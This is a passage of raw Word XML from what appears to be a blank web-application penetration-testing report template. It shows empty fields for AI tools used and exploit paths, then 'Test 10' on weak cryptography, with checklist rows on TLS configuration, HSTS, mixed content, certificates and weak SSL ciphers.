            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="79646D1C" w14:textId="3AA6D366" w:rsidR="00425D1B" w:rsidRPr="00BA25C6" w:rsidRDefault="00425D1B" w:rsidP="00195F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A7B6B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AI Tools Used </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D08CAA5" w14:textId="77777777" w:rsidR="00425D1B" w:rsidRDefault="00425D1B" w:rsidP="00425D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C030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[*ShellGPT,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 ChatGPT,</w:t>
            </w:r>
            <w:r w:rsidRPr="002C030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 Custom Scripts, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4552E692" w14:textId="77777777" w:rsidR="00425D1B" w:rsidRDefault="00425D1B" w:rsidP="00425D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CBAC695" w14:textId="77777777" w:rsidR="00425D1B" w:rsidRPr="00BA25C6" w:rsidRDefault="00425D1B" w:rsidP="00425D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25D1B" w:rsidRPr="00BA25C6" w14:paraId="64815127" w14:textId="77777777" w:rsidTr="00195F38">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5724AF58" w14:textId="5013296C" w:rsidR="00425D1B" w:rsidRPr="00BA7B6B" w:rsidRDefault="00425D1B" w:rsidP="00195F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B6A7F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Scripts or Prompts Used for Automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A28EF6D" w14:textId="77777777" w:rsidR="00425D1B" w:rsidRDefault="00425D1B" w:rsidP="00425D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F75DE3F" w14:textId="77777777" w:rsidR="00425D1B" w:rsidRDefault="00425D1B" w:rsidP="00425D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567A713" w14:textId="77777777" w:rsidR="00425D1B" w:rsidRPr="002C030C" w:rsidRDefault="00425D1B" w:rsidP="00425D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425D1B" w:rsidRPr="00BA25C6" w14:paraId="66963AE1" w14:textId="77777777" w:rsidTr="00195F38">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6EB775D9" w14:textId="2C5DBA95" w:rsidR="00425D1B" w:rsidRPr="004B6A7F" w:rsidRDefault="00425D1B" w:rsidP="00195F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3422B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Extracted Information </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22CBAEBD" w14:textId="77777777" w:rsidR="00425D1B" w:rsidRDefault="00425D1B" w:rsidP="00425D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AFB3C82" w14:textId="77777777" w:rsidR="00425D1B" w:rsidRDefault="00425D1B" w:rsidP="00425D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F3104EA" w14:textId="77777777" w:rsidR="00425D1B" w:rsidRDefault="00425D1B" w:rsidP="00425D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425D1B" w:rsidRPr="00BA25C6" w14:paraId="6831F424" w14:textId="77777777" w:rsidTr="00195F38">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="496A312B" w14:textId="5F6FEFCE" w:rsidR="00425D1B" w:rsidRPr="0033422B" w:rsidRDefault="00425D1B" w:rsidP="00195F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F63C0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Exploit Paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="644F8CCC" w14:textId="77777777" w:rsidR="00425D1B" w:rsidRDefault="00425D1B" w:rsidP="00425D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[*If any]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AD95B94" w14:textId="77777777" w:rsidR="00425D1B" w:rsidRDefault="00425D1B" w:rsidP="00425D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9ED1B03" w14:textId="77777777" w:rsidR="00425D1B" w:rsidRDefault="00425D1B" w:rsidP="00425D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425D1B" w:rsidRPr="00BA25C6" w14:paraId="68145FAE" w14:textId="77777777" w:rsidTr="00195F38">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F33DA67" w14:textId="3B81AEE6" w:rsidR="00425D1B" w:rsidRPr="004F67D1" w:rsidRDefault="00425D1B" w:rsidP="00195F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b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Result Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6581F1DD" w14:textId="77777777" w:rsidR="00425D1B" w:rsidRDefault="00425D1B" w:rsidP="00425D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52890F6" w14:textId="77777777" w:rsidR="00425D1B" w:rsidRDefault="00425D1B" w:rsidP="00425D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04E19DD" w14:textId="77777777" w:rsidR="00425D1B" w:rsidRDefault="00425D1B" w:rsidP="00425D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F430DBA" w14:textId="77777777" w:rsidR="00425D1B" w:rsidRDefault="00425D1B" w:rsidP="00425D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34E90C3" w14:textId="77777777" w:rsidR="00425D1B" w:rsidRDefault="00425D1B" w:rsidP="00425D1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</w:tbl>
    <w:p w14:paraId="3E85A631" w14:textId="38400EFC" w:rsidR="00104FED" w:rsidRDefault="00104FED" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C8BAEE5" w14:textId="77777777" w:rsidR="00104FED" w:rsidRDefault="00104FED">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8EC6F2" w14:textId="06699F0E" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="008D57F2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="008D57F2">
        <w:lastRenderedPageBreak/>
        <w:t>Test 10: Identify Weak Cryptography Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7344FA37" w14:textId="290394EA" w:rsidR="00BA25C6" w:rsidRPr="0041015D" w:rsidRDefault="0041015D" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041015D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">[*This section includes different </w:t>
      </w:r>
      <w:r w:rsidR="00EE1BF8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">techniques for </w:t>
      </w:r>
      <w:r w:rsidRPr="0041015D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>testing web applications for weak encryption algorithms</w:t>
      </w:r>
      <w:r w:rsidR="00D047F2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0041015D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF75FAE" w14:textId="77777777" w:rsidR="0041015D" w:rsidRDefault="0041015D" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto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0E7F53" w:rsidRPr="00A51A96" w14:paraId="08129142" w14:textId="77777777" w:rsidTr="00EE1BF8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7F7A0B5B" w14:textId="007C5D81" w:rsidR="000E7F53" w:rsidRPr="003C713F" w:rsidRDefault="000E7F53" w:rsidP="00972D9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10.1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0E7F53">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Check for Insufficient Transport Layer Protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C1BCD98" w14:textId="77777777" w:rsidR="0041015D" w:rsidRPr="00EE1BF8" w:rsidRDefault="0041015D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98"/>
        <w:gridCol w:w="3431"/>
        <w:gridCol w:w="3431"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E7F53" w:rsidRPr="000E7F53" w14:paraId="24482992" w14:textId="77777777" w:rsidTr="00EE1BF8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32F4BE3C" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="00EE1BF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E7F53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7F315D6E" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="000E7F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232DCA9" w14:textId="77777777" w:rsidR="00C15B99" w:rsidRPr="000E7F53" w:rsidRDefault="00C15B99" w:rsidP="000E7F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E7F53" w:rsidRPr="000E7F53" w14:paraId="39034FDE" w14:textId="77777777" w:rsidTr="00EE1BF8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7F6F8859" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="00EE1BF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E7F53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04EA4D0C" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="000E7F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4CEB504" w14:textId="77777777" w:rsidR="00C15B99" w:rsidRPr="000E7F53" w:rsidRDefault="00C15B99" w:rsidP="000E7F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E7F53" w:rsidRPr="000E7F53" w14:paraId="3DE28D93" w14:textId="77777777" w:rsidTr="00EE1BF8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4F1BC366" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="00EE1BF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E7F53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77241264" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="000E7F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E7F53" w:rsidRPr="000E7F53" w14:paraId="11C0409F" w14:textId="77777777" w:rsidTr="00EE1BF8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375E14FF" w14:textId="3BF5C8D6" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="0016436F" w:rsidP="00EE1BF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6436F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SSL/TLS Configuration Checked?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3431" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F585740" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="000E7F53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E7F53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431" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B17F934" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="000E7F53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E7F53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0E7F53" w:rsidRPr="000E7F53" w14:paraId="7C10CE47" w14:textId="77777777" w:rsidTr="00EE1BF8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177BC9A3" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="00EE1BF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E7F53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Checked for Underprivileged </w:t>
            </w:r>
            <w:r w:rsidRPr="000E7F53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br/>
              <w:t>SSL setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3431" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02F33CB3" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="000E7F53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E7F53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431" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="486C4145" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="000E7F53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E7F53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16436F" w:rsidRPr="000E7F53" w14:paraId="5CFBC70E" w14:textId="77777777" w:rsidTr="00EE1BF8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19C9AE6B" w14:textId="6FF22CC2" w:rsidR="0016436F" w:rsidRPr="000E7F53" w:rsidRDefault="0016436F" w:rsidP="00EE1BF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16436F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Sensitive Data Transmitted Over HTTP?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3431" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="693500A8" w14:textId="23BEB626" w:rsidR="0016436F" w:rsidRPr="000E7F53" w:rsidRDefault="0016436F" w:rsidP="000E7F53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431" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="316724CE" w14:textId="5438234F" w:rsidR="0016436F" w:rsidRPr="000E7F53" w:rsidRDefault="0016436F" w:rsidP="000E7F53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16436F" w:rsidRPr="000E7F53" w14:paraId="55D6AC51" w14:textId="77777777" w:rsidTr="00EE1BF8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7E23BB6E" w14:textId="2B0D1205" w:rsidR="0016436F" w:rsidRPr="0016436F" w:rsidRDefault="0016436F" w:rsidP="00EE1BF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16436F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Certificate Validity &amp; Trust Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3431" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BDA6CD0" w14:textId="65C2C94F" w:rsidR="0016436F" w:rsidRDefault="0016436F" w:rsidP="000E7F53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431" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="458D3929" w14:textId="4BC73BB0" w:rsidR="0016436F" w:rsidRDefault="0016436F" w:rsidP="000E7F53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0E7F53" w:rsidRPr="000E7F53" w14:paraId="1019F822" w14:textId="77777777" w:rsidTr="00EE1BF8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2BC68550" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="00EE1BF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E7F53">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Are Phishing and MITM Attacks Successful</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3431" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="79F509ED" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="000E7F53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E7F53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431" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="488ACE52" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="000E7F53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E7F53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7274F5" w:rsidRPr="000E7F53" w14:paraId="6F9B6C03" w14:textId="77777777" w:rsidTr="00EE1BF8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00AF2A51" w14:textId="4BFF65C2" w:rsidR="007274F5" w:rsidRPr="000E7F53" w:rsidRDefault="007274F5" w:rsidP="00EE1BF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274F5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>HSTS (HTTP Strict Transport Security) Enabled?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3431" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5AF725B7" w14:textId="685B6202" w:rsidR="007274F5" w:rsidRPr="000E7F53" w:rsidRDefault="007274F5" w:rsidP="000E7F53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431" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="566EB17A" w14:textId="6C199922" w:rsidR="007274F5" w:rsidRPr="000E7F53" w:rsidRDefault="007274F5" w:rsidP="000E7F53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EA67E3" w:rsidRPr="000E7F53" w14:paraId="38A375C2" w14:textId="77777777" w:rsidTr="00EE1BF8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32B413A3" w14:textId="6B03919E" w:rsidR="00EA67E3" w:rsidRPr="000E7F53" w:rsidRDefault="00EA67E3" w:rsidP="00EE1BF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A67E3">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Encryption Protocols Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A5139FB" w14:textId="77777777" w:rsidR="00EA67E3" w:rsidRPr="00EA67E3" w:rsidRDefault="00EA67E3" w:rsidP="00EA67E3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EA67E3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[*TLS 1.2, TLS 1.3, Outdated Protocols Detected?]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DCBA330" w14:textId="77777777" w:rsidR="00EA67E3" w:rsidRDefault="00EA67E3" w:rsidP="00EA67E3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  <w:p w14:paraId="5FD29EA5" w14:textId="77777777" w:rsidR="00EA67E3" w:rsidRDefault="00EA67E3" w:rsidP="00EA67E3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  <w:p w14:paraId="6E9080A0" w14:textId="36331D4F" w:rsidR="00C15B99" w:rsidRPr="000E7F53" w:rsidRDefault="00C15B99" w:rsidP="00EA67E3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7274F5" w:rsidRPr="000E7F53" w14:paraId="3EE933C6" w14:textId="77777777" w:rsidTr="00EE1BF8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4896E212" w14:textId="55D9ACB1" w:rsidR="007274F5" w:rsidRPr="00EA67E3" w:rsidRDefault="007274F5" w:rsidP="00EE1BF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274F5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Mixed Content Issues Detected?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17A4B064" w14:textId="77777777" w:rsidR="007274F5" w:rsidRDefault="007274F5" w:rsidP="00EA67E3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Pr="007274F5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes/No, HTTP Resources Loaded on HTTPS Page?</w:t>
            </w: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07B46507" w14:textId="77777777" w:rsidR="007274F5" w:rsidRDefault="007274F5" w:rsidP="00EA67E3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5F6BA015" w14:textId="7D88A7E7" w:rsidR="007274F5" w:rsidRPr="00EA67E3" w:rsidRDefault="007274F5" w:rsidP="00EA67E3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0E7F53" w:rsidRPr="000E7F53" w14:paraId="5D03F6EC" w14:textId="77777777" w:rsidTr="00EE1BF8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4F50E9BF" w14:textId="5D6A426F" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="007274F5" w:rsidP="00EE1BF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 xml:space="preserve">Other </w:t>
            </w:r>
            <w:r w:rsidR="000E7F53" w:rsidRPr="000E7F53"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 Vulnerabilities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6E242378" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="181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B719FB0" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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1080EC2" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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D2B1101" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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83815C0" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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AA73E0A" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="000E7F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E7F53" w:rsidRPr="000E7F53" w14:paraId="647AE421" w14:textId="77777777" w:rsidTr="00EE1BF8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7C24AE26" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="00EE1BF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E7F53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2639CFA8" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="182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2E03095" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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DB481B8" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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0E15585" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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F9ABBCF" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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E23F501" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRPr="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="000E7F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C4B44" w:rsidRPr="000E7F53" w14:paraId="18F1F0C3" w14:textId="77777777" w:rsidTr="00EE1BF8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01412CAC" w14:textId="668DC351" w:rsidR="003C4B44" w:rsidRPr="000E7F53" w:rsidRDefault="003C4B44" w:rsidP="00EE1BF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b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Result Analysis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5A8750DC" w14:textId="77777777" w:rsidR="003C4B44" w:rsidRDefault="003C4B44" w:rsidP="003C4B4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435EE0D" w14:textId="77777777" w:rsidR="003C4B44" w:rsidRDefault="003C4B44" w:rsidP="003C4B4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3FA324D" w14:textId="77777777" w:rsidR="003C4B44" w:rsidRDefault="003C4B44" w:rsidP="003C4B4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0689C0C" w14:textId="77777777" w:rsidR="003C4B44" w:rsidRDefault="003C4B44" w:rsidP="003C4B4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C5B6301" w14:textId="77777777" w:rsidR="003C4B44" w:rsidRPr="000E7F53" w:rsidRDefault="003C4B44" w:rsidP="003C4B4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4C7A056F" w14:textId="77777777" w:rsidR="000E7F53" w:rsidRDefault="000E7F53" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto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873243" w:rsidRPr="00A51A96" w14:paraId="510E13A9" w14:textId="77777777" w:rsidTr="007671CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="254B33C7" w14:textId="6564B46B" w:rsidR="00873243" w:rsidRPr="003C713F" w:rsidRDefault="00873243" w:rsidP="00972D9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10.2</w:t>
            </w:r>
            <w:r w:rsidRPr="007671CB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7671CB">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Check for Weak SSL Ciphers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EF8AE7F" w14:textId="77777777" w:rsidR="00873243" w:rsidRPr="007671CB" w:rsidRDefault="00873243" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto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45"/>
        <w:gridCol w:w="2970"/>
        <w:gridCol w:w="3645"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w14:paraId="68E8CCDC" w14:textId="77777777" w:rsidTr="007671C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586CD4E4" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="007671C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53BBB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615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62301029" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="00D53BB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53BBB" w:rsidRPr="00D53BBB" w14:paraId="26BC5034" w14:textId="77777777" w:rsidTr="007671C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4607F734" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="007671C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53BBB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615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AA35338" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="00D53BB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53BBB" w:rsidRPr="00D53BBB" w14:paraId="452D34BE" w14:textId="77777777" w:rsidTr="007671C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215DB1F6" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="007671C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53BBB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615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2280E065" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="00D53BB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53BBB" w:rsidRPr="00D53BBB" w14:paraId="6D27EEBC" w14:textId="77777777" w:rsidTr="007671CB">
        <w:trPr>
          <w:trHeight w:val="1052"/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724D43BF" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="007671C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53BBB">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Commands Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
